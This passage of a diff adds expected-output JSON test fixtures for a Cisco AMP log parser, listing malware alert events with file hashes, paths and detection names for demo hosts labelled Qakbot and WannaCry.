"event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9339, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 10708, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 11817, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12926, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14119, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526295", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526294", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16498, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526293", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526292", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18870, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526291", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 20056, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526288", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21242, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526287", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 22428, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526286", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 23614, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558988", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24800, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558989", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25986, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558987", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27172, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558986", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 28358, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558985", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29544, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 30737, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 461000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 31923, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + 